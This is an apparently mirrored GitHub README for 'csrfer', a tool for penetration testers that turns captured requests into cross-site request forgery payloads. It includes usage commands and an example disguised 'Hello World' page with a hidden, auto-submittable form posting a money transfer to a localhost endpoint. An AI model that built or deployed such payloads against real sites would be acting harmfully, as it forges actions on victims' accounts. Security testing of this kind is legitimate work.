Git Product home page Git Product logo

csrfer's Introduction

CSRFER


 _____  _________________ ___________ 
/  __ \/  ___| ___ \  ___|  ___| ___ \
| /  \/\ `--.| |_/ / |_  | |__ | |_/ /
| |     `--. \    /|  _| |  __||    / 
| \__/\/\__/ / |\ \| |   | |___| |\ \ 
 \____/\____/\_| \_\_|   \____/\_| \_|
                                      
          -.--.
          )  " '-,
          ',' 2  \_
           \q \ .  \
        _.--'  '----.__
       /  ._      _.__ \__
    _.'_.'  \_ .-._\_ '-, }
   (,/ _.---;-(  . \ \   ~
 ____ (  .___\_\  \/_/
(      '-._ \   \ |
 '._       ),> _) >
    '-._ c='  Cooo  -._
        '-._           '.
            '-._         `\
       snd      '-._       '.
                    '-._     \
                        `~---'

CSRFER is a tool to generate csrf payloads, based on vulnerable requests.

It parses supplied requests to generate either a form or a fetch request. The payload can then be embedded in an html template.

Installation

npm install -g csrfer

Usage:

Usage: csrfer [options]

Options:
  --version              Show version number
  -r, --request          Path to the request file to be used
  -m, --mode             Mode to generate the code. Available options: form, fetch. (Default is form)
  -a, --autosubmit       Auto submit the request on page load
  -s, --show             Show the form inputs (only for form mode)
  -o, --output           Output the payload to the specified file instead of STDOUT
  -t, --template         Path to an html template page. Use the placeholder {{CONTENT}} to specify where to
                         inject the code (in html, not JS)
  -T, --defaulttemplate  Use this option if you want the code to be injected into a default html page.
  -h, --help             Show help

Examples:
  csrfer -r req.txt -m form -a                    Automatically submit a form request
  csrfer -r req.txt -m form -s                    Generate and shows a form to be submitted manually
  csrfer -r req.txt -m fetch -t my_template.html  Generates a fetch request and uses the supplied template
                                                  page

Example output

<!DOCTYPE html>
<html>

<head>
  <title>This is Hello World page</title>
</head>

<body>
  <h1>Hello World</h1>

  <form id="csrf" name="csrf" action="http://localhost:8000/1.php" method="POST"
    enctype="application/x-www-form-urlencoded"><input id='destination' name='destination' type='hidden'
      value='123-123123-123' /><br><input id='amount' name='amount' type='hidden' value='50&#x20AC;' /><br><input
      type='submit' value='submit'></form>
</body>

</html>

License

This project is MIT licensed

csrfer's People

Contributors

luisfontes19 avatar

Watchers

avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.